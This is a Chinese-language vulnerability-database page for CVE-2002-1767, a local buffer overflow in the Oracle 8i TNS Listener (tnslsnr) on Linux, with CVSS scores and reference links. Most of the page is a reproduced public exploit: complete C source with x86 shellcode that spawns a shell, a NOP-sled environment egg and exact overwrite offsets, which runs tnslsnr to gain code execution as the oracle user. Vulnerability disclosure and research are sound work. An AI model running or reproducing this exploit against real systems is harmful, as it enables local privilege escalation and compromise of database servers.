CVE-2002-1767
CVSS7.2
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:27
NMCOE    

[原文]Buffer overflow in tnslsnr of Oracle 8i Database Server 8.1.5 for Linux allows local users to execute arbitrary code as the oracle user via a long command line argument.


[CNNVD]Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞(CNNVD-200212-086)

        基于Linux的Oracle 8i Database Server 8.1.5版本中tnslsnr存在缓冲区溢出漏洞。本地用户作为数据库使用者借助超长命令行参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1767
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1767
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-086
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/8772
(UNKNOWN)  XF  oracle-tnslsnr-command-line-bo(8772)
http://www.securityfocus.com/bid/4413
(UNKNOWN)  BID  4413

- 漏洞信息

Oracle 8i TNS Listener 本地命令参数缓冲区溢出漏洞
高危 缓冲区溢出
2002-12-31 00:00:00 2005-10-20 00:00:00
本地  
        基于Linux的Oracle 8i Database Server 8.1.5版本中tnslsnr存在缓冲区溢出漏洞。本地用户作为数据库使用者借助超长命令行参数执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21362)

Oracle 8i TNS Listener Local Command Parameter Buffer Overflow Vulnerability (EDBID:21362)
linux local
2002-04-01 Verified
0 the itch
N/A [点击下载]
source: http://www.securityfocus.com/bid/4413/info

Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems.

A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'.

Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable. 

/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslash@snosoft.com if you wish to participate in vuln research. 
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more then 2132 bytes into the
 *     buffer at the command line 2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more then 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133


/* Shellcode made by r0z (r0z@promisc.org) */
char shellcode[] =
         "\x31\xdb"              /* xor   %ebx, %ebx     */
         "\x31\xc9"              /* xor   %ecx, %ecx     */
         "\xf7\xe3"              /* mul   %ebx           */
         "\xb0\x46"              /* mov   $0x46, %al     */
         "\x66\xbb\x03\x02"      /* mov   $0x1fc, %bx    */
         "\x49"                  /* dec   %ecx           */
         "\xcd\x80"              /* int   $0x80          */
         "\x31\xd2"              /* xor   %edx, %edx     */
         "\x52"                  /* push  %edx           */
         "\x68\x6e\x2f\x73\x68"  /* push  $0x68732f6e    */
         "\x68\x2f\x2f\x62\x69"  /* push  $0x69622f2f    */
         "\x89\xe3"              /* mov   %esp, %ebx     */
         "\x52"                  /* push  %edx           */
         "\x53"                  /* push  %ebx           */
         "\x89\xe1"              /* mov   %esp, %ecx     */
         "\x6a\x0b"              /* pushl $0xb           */
         "\x58"                  /* pop   %eax           */
         "\xcd\x80";             /* int   $0x80          */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("Oracle tnslsrn 8.1.5\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize - 1);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        buff[bsize - 1 ]= '\0';
        execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
              "tnslsnr", buff, 0);
        return 0;
}

		

- 漏洞信息

59753
Oracle Database tnslsnr Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-04-01 Unknow
2002-04-01 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站